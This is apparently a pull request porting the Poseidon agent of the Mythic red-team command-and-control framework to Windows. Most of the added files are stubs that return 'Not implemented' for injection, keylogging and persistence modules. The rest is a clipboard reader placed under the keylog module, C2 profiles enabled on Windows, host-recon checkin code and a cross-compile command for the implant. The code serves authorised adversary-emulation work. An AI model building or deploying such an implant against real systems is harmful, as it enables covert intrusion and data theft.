### PR TITLE
Windows compatability

### DIFF
--- a/Payload_Type/poseidon/Dockerfile
+++ b/Payload_Type/poseidon/Dockerfile
@@ -1,1 +1,4 @@
 FROM itsafeaturemythic/xgolang_payload:0.1.2
+
+# Needed package for Windows cross compiling
+RUN apt update; apt-get -y install gcc-mingw-w64

--- a/Payload_Type/poseidon/agent_code/drives/drives_windows.go
+++ b/Payload_Type/poseidon/agent_code/drives/drives_windows.go
@@ -1,0 +1,13 @@
+// +build windows
+
+package drives
+
+import (
+	// Standard
+	"errors"
+)
+
+func listDrives() ([]Drive, error) {
+	
+	return nil, errors.New("Command not compatible with Windows")
+}

--- a/Payload_Type/poseidon/agent_code/dyld_inject/dyld_inject_windows.go
+++ b/Payload_Type/poseidon/agent_code/dyld_inject/dyld_inject_windows.go
@@ -1,0 +1,21 @@
+// +build windows
+
+package dyldinject
+
+import (
+	"errors"
+)
+
+type DyldInjectWindows struct {
+	Successful bool
+}
+
+func (j *DyldInjectWindows) Success() bool {
+	return j.Successful
+}
+
+func runCommand(app string, dylib string, hide bool) (DyldInjectWindows, error) {
+	n := DyldInjectWindows{}
+	n.Successful = false
+	return n, errors.New("Not compatible")
+}

--- a/Payload_Type/poseidon/agent_code/execute_memory/execute_memory_windows.go
+++ b/Payload_Type/poseidon/agent_code/execute_memory/execute_memory_windows.go
@@ -1,0 +1,13 @@
+// +build windows
+
+package execute_memory
+
+type WindowsExecuteMemory struct {
+	Message string
+}
+
+func executeMemory(memory []byte, functionName string, argString string) (WindowsExecuteMemory, error) {
+	res := WindowsExecuteMemory{}
+	res.Message = "Not compatible"
+	return res, nil
+}

--- a/Payload_Type/poseidon/agent_code/jsimport_call/jxa_windows.go
+++ b/Payload_Type/poseidon/agent_code/jsimport_call/jxa_windows.go
@@ -1,0 +1,28 @@
+// +build windows
+
+package jsimport_call
+
+import (
+	"errors"
+)
+
+type JxaRunWindows struct {
+	Successful bool
+	Resultstring string
+}
+
+func (j *JxaRunWindows) Success() bool {
+	return j.Successful
+}
+
+func (j *JxaRunWindows) Result() string {
+	return j.Resultstring
+}
+
+
+func runCommand(encpayload string) (JxaRunWindows, error) {
+	n := JxaRunWindows{}
+	n.Resultstring = ""
+	n.Successful = false
+	return n, errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/jxa/jxa_windows.go
+++ b/Payload_Type/poseidon/agent_code/jxa/jxa_windows.go
@@ -1,0 +1,28 @@
+// +build windows
+
+package jxa
+
+import (
+	"errors"
+)
+
+type JxaRunWindows struct {
+	Successful bool
+	Resultstring string
+}
+
+func (j *JxaRunWindows) Success() bool {
+	return j.Successful
+}
+
+func (j *JxaRunWindows) Result() string {
+	return j.Resultstring
+}
+
+
+func runCommand(encpayload string) (JxaRunWindows, error) {
+	n := JxaRunWindows{}
+	n.Resultstring = ""
+	n.Successful = false
+	return n, errors.New("Not compatible")
+}

--- a/Payload_Type/poseidon/agent_code/keylog/clipboard/clipboard_windows.go
+++ b/Payload_Type/poseidon/agent_code/keylog/clipboard/clipboard_windows.go
@@ -1,0 +1,157 @@
+// Copyright 2013 @atotto. All rights reserved.
+// Use of this source code is governed by a BSD-style
+// license that can be found in the LICENSE file.
+
+// +build windows
+
+package clipboard
+
+import (
+	"runtime"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	cfUnicodetext = 13
+	gmemMoveable  = 0x0002
+)
+
+var (
+	user32                     = syscall.MustLoadDLL("user32")
+	isClipboardFormatAvailable = user32.MustFindProc("IsClipboardFormatAvailable")
+	openClipboard              = user32.MustFindProc("OpenClipboard")
+	closeClipboard             = user32.MustFindProc("CloseClipboard")
+	emptyClipboard             = user32.MustFindProc("EmptyClipboard")
+	getClipboardData           = user32.MustFindProc("GetClipboardData")
+	setClipboardData           = user32.MustFindProc("SetClipboardData")
+
+	kernel32     = syscall.NewLazyDLL("kernel32")
+	globalAlloc  = kernel32.NewProc("GlobalAlloc")
+	globalFree   = kernel32.NewProc("GlobalFree")
+	globalLock   = kernel32.NewProc("GlobalLock")
+	globalUnlock = kernel32.NewProc("GlobalUnlock")
+	lstrcpy      = kernel32.NewProc("lstrcpyW")
+)
+
+// waitOpenClipboard opens the clipboard, waiting for up to a second to do so.
+func waitOpenClipboard() error {
+	started := time.Now()
+	limit := started.Add(time.Second)
+	var r uintptr
+	var err error
+	for time.Now().Before(limit) {
+		r, _, err = openClipboard.Call(0)
+		if r != 0 {
+			return nil
+		}
+		time.Sleep(time.Millisecond)
+	}
+	return err
+}
+
+func readAll() (string, error) {
+	// LockOSThread ensure that the whole method will keep executing on the same thread from begin to end (it actually locks the goroutine thread attribution).
+	// Otherwise if the goroutine switch thread during execution (which is a common practice), the OpenClipboard and CloseClipboard will happen on two different threads, and it will result in a clipboard deadlock.
+	runtime.LockOSThread()
+	defer runtime.UnlockOSThread()
+	if formatAvailable, _, err := isClipboardFormatAvailable.Call(cfUnicodetext); formatAvailable == 0 {
+		return "", err
+	}
+	err := waitOpenClipboard()
+	if err != nil {
+		return "", err
+	}
+
+	h, _, err := getClipboardData.Call(cfUnicodetext)
+	if h == 0 {
+		_, _, _ = closeClipboard.Call()
+		return "", err
+	}
+
+	l, _, err := globalLock.Call(h)
+	if l == 0 {
+		_, _, _ = closeClipboard.Call()
+		return "", err
+	}
+
+	text := syscall.UTF16ToString((*[1 << 20]uint16)(unsafe.Pointer(l))[:])
+
+	r, _, err := globalUnlock.Call(h)
+	if r == 0 {
+		_, _, _ = closeClipboard.Call()
+		return "", err
+	}
+
+	closed, _, err := closeClipboard.Call()
+	if closed == 0 {
+		return "", err
+	}
+	return text, nil
+}
+
+func writeAll(text string) error {
+	// LockOSThread ensure that the whole method will keep executing on the same thread from begin to end (it actually locks the goroutine thread attribution).
+	// Otherwise if the goroutine switch thread during execution (which is a common practice), the OpenClipboard and CloseClipboard will happen on two different threads, and it will result in a clipboard deadlock.
+	runtime.LockOSThread()
+	defer runtime.UnlockOSThread()
+
+	err := waitOpenClipboard()
+	if err != nil {
+		return err
+	}
+
+	r, _, err := emptyClipboard.Call(0)
+	if r == 0 {
+		_, _, _ = closeClipboard.Call()
+		return err
+	}
+
+	data := syscall.StringToUTF16(text)
+
+	// "If the hMem parameter identifies a memory object, the object must have
+	// been allocated using the function with the GMEM_MOVEABLE flag."
+	h, _, err := globalAlloc.Call(gmemMoveable, uintptr(len(data)*int(unsafe.Sizeof(data[0]))))
+	if h == 0 {
+		_, _, _ = closeClipboard.Call()
+		return err
+	}
+	defer func() {
+		if h != 0 {
+			globalFree.Call(h)
+		}
+	}()
+
+	l, _, err := globalLock.Call(h)
+	if l == 0 {
+		_, _, _ = closeClipboard.Call()
+		return err
+	}
+
+	r, _, err = lstrcpy.Call(l, uintptr(unsafe.Pointer(&data[0])))
+	if r == 0 {
+		_, _, _ = closeClipboard.Call()
+		return err
+	}
+
+	r, _, err = globalUnlock.Call(h)
+	if r == 0 {
+		if err.(syscall.Errno) != 0 {
+			_, _, _ = closeClipboard.Call()
+			return err
+		}
+	}
+
+	r, _, err = setClipboardData.Call(cfUnicodetext, h)
+	if r == 0 {
+		_, _, _ = closeClipboard.Call()
+		return err
+	}
+	h = 0 // suppress deferred cleanup
+	closed, _, err := closeClipboard.Call()
+	if closed == 0 {
+		return err
+	}
+	return nil
+}

--- a/Payload_Type/poseidon/agent_code/keylog/keystate/keystate_windows.go
+++ b/Payload_Type/poseidon/agent_code/keylog/keystate/keystate_windows.go
@@ -1,0 +1,9 @@
+// +build windows
+
+package keystate
+
+import "errors"
+
+func keyLogger() error {
+	return errors.New("Not implemented.")
+}

--- a/Payload_Type/poseidon/agent_code/keys/keys_windows.go
+++ b/Payload_Type/poseidon/agent_code/keys/keys_windows.go
@@ -1,0 +1,24 @@
+// +build windows
+
+package keys
+
+import "errors"
+
+type WindowsKeyOperation struct {
+	KeyType string
+	KeyData []byte
+}
+
+// TODO: Implement function to enumerate macos keychain
+func (d *WindowsKeyOperation) Type() string {
+	return d.KeyType
+}
+
+func (d *WindowsKeyOperation) Data() []byte {
+	return d.KeyData
+}
+
+func getkeydata(opt Options) (WindowsKeyOperation, error) {
+	d := WindowsKeyOperation{}
+	return d, errors.New("Not compatible")
+}

--- a/Payload_Type/poseidon/agent_code/libinject/libinject_windows.go
+++ b/Payload_Type/poseidon/agent_code/libinject/libinject_windows.go
@@ -1,0 +1,106 @@
+// +build windows
+
+package libinject
+
+/*
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <errno.h>
+
+static FILE *cgo_get_stdin(void)  { return stdin;  }
+static FILE *cgo_get_stdout(void) { return stdout; }
+static FILE *cgo_get_stderr(void) { return stderr; }
+*/
+
+/*
+Note: Because this is currently not-operational,
+	  lines 21-26 and 51-70 have been commented out.
+*/
+
+// import (
+// 	"C"
+// 	"unsafe"
+// )
+
+// type File C.FILE
+
+type WindowsInjection struct {
+	Target      int
+	Successful  bool
+	Payload     []byte
+	LibraryPath string
+}
+
+func (l *WindowsInjection) TargetPid() int {
+	return l.Target
+}
+
+func (l *WindowsInjection) Success() bool {
+	return l.Successful
+}
+
+func (l *WindowsInjection) Shellcode() []byte {
+	return l.Payload
+}
+
+func (l *WindowsInjection) SharedLib() string {
+	return l.LibraryPath
+}
+
+// func Open(path, mode string) *File {
+// 	cpath, cmode := C.CString(path), C.CString(mode)
+// 	defer C.free(unsafe.Pointer(cpath))
+// 	defer C.free(unsafe.Pointer(cmode))
+
+// 	return (*File)(C.fopen(cpath, cmode))
+// }
+
+// func (f *File) Put(str string) {
+// 	cstr := C.CString(str)
+// 	defer C.free(unsafe.Pointer(cstr))
+
+// 	C.fputs(cstr, (*C.FILE)(f))
+// 	return
+// }
+
+// func (f *File) Get(n int) string {
+// 	cbuf := make([]C.char, n)
+// 	return C.GoString(C.fgets(&cbuf[0], C.int(n), (*C.FILE)(f)))
+// }
+
+func injectLibrary(pid int, path string) (WindowsInjection, error) {
+	res := WindowsInjection{}
+	/*oldregs := syscall.PtraceRegs{}
+
+	// Try to attach to the target process
+	traceeHandle, err := ptrace.Attach(pid)
+
+	if err != nil {
+		return res, err
+	}
+
+	var w syscall.WaitStatus
+	r := syscall.Rusage{}
+
+	// wait for the target process to signal
+	wpid, err := syscall.Wait4(pid, &w, 0, &r)
+	log.Println("Pid ", wpid)
+	if err != nil {
+		return res, err
+	}
+
+	// Get the registers to save their state
+	registers, err := traceeHandle.GetRegs()
+
+	if err != nil {
+		return res, err
+	}
+
+	oldregs = registers
+
+	//oldcode := C.malloc(C.sizeof_char * 9076)
+	*/
+	res.Successful = false
+	return res, nil
+}

--- a/Payload_Type/poseidon/agent_code/list_entitlements/list_entitlements_windows.go
+++ b/Payload_Type/poseidon/agent_code/list_entitlements/list_entitlements_windows.go
@@ -1,0 +1,23 @@
+// +build windows
+
+package list_entitlements
+
+type WindowsListEntitlements struct {
+	Successful  bool
+	Message string
+	CodeSign int
+}
+
+func listEntitlements(pid int) (WindowsListEntitlements, error) {
+	res := WindowsListEntitlements{}
+    res.Successful = false
+    res.Message = "Not Supported"
+	return res, nil
+}
+func listCodeSign(pid int) (WindowsListEntitlements, error) {
+	res := WindowsListEntitlements{}
+    res.Successful = false
+    res.Message = "Not Supported"
+    res.CodeSign = -1;
+	return res, nil
+}

--- a/Payload_Type/poseidon/agent_code/listtasks/listtasks_windows.go
+++ b/Payload_Type/poseidon/agent_code/listtasks/listtasks_windows.go
@@ -1,0 +1,25 @@
+// +build windows
+
+package listtasks
+
+import (
+	"errors"
+)
+
+type ListtasksWindows struct {
+	Results map[string]interface{}
+}
+
+func (l *ListtasksWindows) Result() map[string]interface{} {
+	return l.Results
+}
+
+func getAvailableTasks() (ListtasksWindows, error) {
+	n := ListtasksWindows{}
+	m := map[string]interface{}{
+		"result": "not implemented",
+	}
+
+	n.Results = m
+	return n, errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/ls/ls_nix.go
+++ b/Payload_Type/poseidon/agent_code/ls/ls_nix.go
@@ -1,0 +1,34 @@
+// +build darwin linux
+
+package ls
+
+import (
+	"encoding/json"
+	"syscall"
+	"os"
+	"os/user"
+	"strconv"
+)
+
+func GetPermission(finfo os.FileInfo) (string, error) {
+	perms := FilePermission{}
+	perms.Permissions = finfo.Mode().Perm().String()
+	systat := finfo.Sys().(*syscall.Stat_t)
+	if systat != nil {
+		perms.UID = int(systat.Uid)
+		perms.GID = int(systat.Gid)
+		tmpUser, err := user.LookupId(strconv.Itoa(perms.UID))
+		if err == nil {
+			perms.User = tmpUser.Username
+		}
+		tmpGroup, err := user.LookupGroupId(strconv.Itoa(perms.GID))
+		if err == nil {
+			perms.Group = tmpGroup.Name
+		}
+	}
+	data, err := json.Marshal(perms)
+	if err == nil {
+		return string(data), nil
+	}
+	return "", nil
+}

--- a/Payload_Type/poseidon/agent_code/ls/ls_windows.go
+++ b/Payload_Type/poseidon/agent_code/ls/ls_windows.go
@@ -1,0 +1,12 @@
+// +build windows
+
+package ls
+
+import (
+	"os"
+	"errors"
+)
+
+func GetPermission(finfo os.FileInfo) (string, error) {
+	return "", errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/persist_loginitem/persist_loginitem_windows.go
+++ b/Payload_Type/poseidon/agent_code/persist_loginitem/persist_loginitem_windows.go
@@ -1,0 +1,21 @@
+// +build windows
+
+package persist_loginitem
+
+import (
+	"errors"
+)
+
+type PersistLoginItemWindows struct {
+	Successful bool
+}
+
+func (j *PersistLoginItemWindows) Success() bool {
+	return j.Successful
+}
+
+func runCommand(name string, path string, global bool) (PersistLoginItemWindows, error) {
+	n := PersistLoginItemWindows{}
+	n.Successful = false
+	return n, errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/pkg/profiles/http.go
+++ b/Payload_Type/poseidon/agent_code/pkg/profiles/http.go
@@ -1,4 +1,4 @@
-// +build linux darwin
+// +build linux darwin windows
 // +build http
 
 package profiles

--- a/Payload_Type/poseidon/agent_code/pkg/profiles/tcp.go
+++ b/Payload_Type/poseidon/agent_code/pkg/profiles/tcp.go
@@ -1,4 +1,4 @@
-// +build linux darwin
+// +build linux darwin windows
 // +build poseidon_tcp
 
 package profiles

--- a/Payload_Type/poseidon/agent_code/pkg/profiles/websocket.go
+++ b/Payload_Type/poseidon/agent_code/pkg/profiles/websocket.go
@@ -1,4 +1,4 @@
-// +build linux darwin
+// +build linux darwin windows
 // +build websocket
 
 package profiles

--- a/Payload_Type/poseidon/agent_code/pkg/utils/functions/functions_windows.go
+++ b/Payload_Type/poseidon/agent_code/pkg/utils/functions/functions_windows.go
@@ -1,0 +1,114 @@
+// +build windows
+
+package functions
+
+import (
+	"fmt"
+	"os"
+	"os/user"
+	"runtime"
+	"unicode/utf16"
+
+	"golang.org/x/sys/windows"
+)
+
+func isElevated() bool {
+	currentUser, _ := user.Current()
+	return currentUser.Uid == "0"
+}
+func getArchitecture() string {
+	return runtime.GOARCH
+}
+func getProcessName() string {
+	name, err := os.Executable()
+	if err != nil {
+		return ""
+	} else {
+		return name
+	}
+}
+func getDomain() string {
+	return ""
+}
+func getStringFromBytes(data [65]byte) string {
+	stringData := make([]byte, 0, 0)
+	for i := range data {
+		if data[i] == 0 {
+			return string(stringData[:])
+		} else {
+			stringData = append(stringData, data[i])
+		}
+	}
+	return string(stringData[:])
+}
+func getOS() string {
+	v := windows.RtlGetVersion()
+	return fmt.Sprintf("Windows %d.%d.%d", v.MajorVersion, v.MinorVersion, v.BuildNumber)
+}
+func getUser() string {
+	currentUser, err := user.Current()
+	if err != nil {
+		return ""
+	} else {
+		return currentUser.Username
+	}
+}
+func getPID() int {
+	return os.Getpid()
+}
+func getHostname() string {
+	hostname, err := os.Hostname()
+	if err != nil {
+		return ""
+	} else {
+		return hostname
+	}
+}
+
+// Helper function to convert DWORD byte counts to
+// human readable sizes.
+func UINT32ByteCountDecimal(b uint32) string {
+	const unit = 1024
+	if b < unit {
+		return fmt.Sprintf("%d B", b)
+	}
+	div, exp := uint32(unit), 0
+	for n := b / unit; n >= unit; n /= unit {
+		div *= unit
+		exp++
+	}
+	return fmt.Sprintf("%.1f %cB", float32(b)/float32(div), "kMGTPE"[exp])
+}
+
+// Helper function to convert LARGE_INTEGER byte
+//  counts to human readable sizes.
+func UINT64ByteCountDecimal(b uint64) string {
+	const unit = 1024
+	if b < unit {
+		return fmt.Sprintf("%d B", b)
+	}
+	div, exp := uint64(unit), 0
+	for n := b / unit; n >= unit; n /= unit {
+		div *= unit
+		exp++
+	}
+	return fmt.Sprintf("%.1f %cB", float64(b)/float64(div), "kMGTPE"[exp])
+}
+
+// Helper function to build a string from a WCHAR string
+func UTF16ToString(s []uint16) []string {
+	var results []string
+	cut := 0
+	for i, v := range s {
+		if v == 0 {
+			if i-cut > 0 {
+				results = append(results, string(utf16.Decode(s[cut:i])))
+			}
+			cut = i + 1
+		}
+	}
+	if cut < len(s) {
+		results = append(results, string(utf16.Decode(s[cut:])))
+	}
+	return results
+}

--- a/Payload_Type/poseidon/agent_code/ps/ps_windows.go
+++ b/Payload_Type/poseidon/agent_code/ps/ps_windows.go
@@ -1,0 +1,11 @@
+// +build windows
+
+package ps
+
+import (
+	"errors"
+)
+
+func Processes() ([]Process, error) {
+	return nil, errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/screencapture/screencapture_windows.go
+++ b/Payload_Type/poseidon/agent_code/screencapture/screencapture_windows.go
@@ -1,0 +1,11 @@
+// +build windows
+
+package screencapture
+
+import (
+	"errors"
+)
+
+func getscreenshot() ([]ScreenShot, error) {
+	return nil, errors.New("Not implemented")
+}

--- a/Payload_Type/poseidon/agent_code/xpc/xpc_windows.go
+++ b/Payload_Type/poseidon/agent_code/xpc/xpc_windows.go
@@ -1,0 +1,13 @@
+// +build windows 
+
+package xpc
+
+import (
+	"errors"
+)
+
+
+func runCommand(command string) ([]byte, error) {
+	n := make([]byte, 0)
+	return n, errors.New("not implemented")
+}

--- a/Payload_Type/poseidon/mythic/agent_functions/ls.py
+++ b/Payload_Type/poseidon/mythic/agent_functions/ls.py
@@ -42,7 +42,9 @@ class LsCommand(CommandBase):
     attackmapping = ["T1083"]
     browser_script = [BrowserScript(script_name="ls", author="@its_a_feature_"),
                       BrowserScript(script_name="ls_new", author="@its_a_feature_", for_new_ui=True)]
-
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
+    )
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         if task.args.has_arg("file_browser") and task.args.get_arg("file_browser"):
             host = task.callback.host

--- a/Payload_Type/poseidon/mythic/agent_functions/ps.py
+++ b/Payload_Type/poseidon/mythic/agent_functions/ps.py
@@ -22,7 +22,9 @@ class PsCommand(CommandBase):
     argument_class = PsArguments
     attackmapping = ["T1057"]
     browser_script = BrowserScript(script_name="ps_new", author="@djhohnstein", for_new_ui=True)
-
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
+    )
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         task.display_params = task.args.command_line
         return task

--- a/Payload_Type/poseidon/mythic/agent_functions/setenv.py
+++ b/Payload_Type/poseidon/mythic/agent_functions/setenv.py
@@ -22,6 +22,9 @@ class SetEnvCommand(CommandBase):
     author = "@xorrior"
     argument_class = SetEnvArguments
     attackmapping = []
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
+    )
 
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         return task

--- a/Payload_Type/poseidon/mythic/agent_functions/shell.py
+++ b/Payload_Type/poseidon/mythic/agent_functions/shell.py
@@ -21,6 +21,9 @@ class ShellCommand(CommandBase):
     author = "@xorrior"
     argument_class = ShellArguments
     attackmapping = ["T1059.004"]
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
+    )
 
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         resp = await MythicRPC().execute("create_artifact", task_id=task.id,

--- a/Payload_Type/poseidon/mythic/agent_functions/unsetenv.py
+++ b/Payload_Type/poseidon/mythic/agent_functions/unsetenv.py
@@ -21,6 +21,9 @@ class UnsetEnvCommand(CommandBase):
     author = "@xorrior"
     argument_class = UnsetEnvArguments
     attackmapping = []
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
+    )
 
     async def create_tasking(self, task: MythicTask) -> MythicTask:
         return task


### PR DESCRIPTION
There were lots of small changes that needed to happen to make poseidon work with Windows. Here's the summary:

Major Changes:
==========
* Dockerfile downloads gcc-mingw-w64 to enable cross compiling within the Linux docker container to windows exe
`RUN apt update; apt-get -y install gcc-mingw-w64`
* `agent_functions/builder.py` now includes a Windows build command the uses the typical `go build` method rather than xgo. (I couldn't get xgo to work for windows...)
```
elif target_os == "windows":
                command += "mkdir /build;"
                command += (
                    "GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -ldflags=\"{}\" -tags {} -o /build/poseidon-windows-amd64".format(
                        ldflags,
                        profile,
                    )
                )
```
* `pkg/utils/functions_windows.go` Used **golang.org/x/sys/windows** to call RtlGetVersion() win32 API for getOS() function. This is required for the checkin process to collect necessary information.

Minor changes:
==========
For the most part, I had to go in various command packages and add a <command>_windows.go file with the `//+build windows` header and include a return error of *"Not Implemented/Compatible"*. These cases are found in:
* drives_windows.go
* dyld_inject_windows.go
* execute_memory_windows.go
* jxa_windows.go
* keylog/keystate/keystate_windows.go
* keys_windows.go
* libinject_windows.go
* list_entitlements_windows.go
* listtasks_windows.go
* persist_loginitem_windows.go
* ps_windows.go
* ls_windows.go
* screencapture_windows.go
* xpc_windows.go

Some commands build, but do not work for windows. For these situations, I went into the agent_function/<command>.py file and disabled them for windows by adding:
```
attributes = CommandAttributes(
    supported_os=[SupportedOS.MacOS, SupportedOS.Linux]
)
```
This change can be found in:
* setenv.py
* unsetenv.py
* shell.py
* ps.py

Notable Testing Success:
===============
* Windows *default* executable builds successfully and works with all profiles: websocket, http, and poseidon_tcp
* Windows egress agent can successfully perform the `link_tcp` and `unlink_tcp` command for P2P comms (to windows and linux poseidon_tcp agents)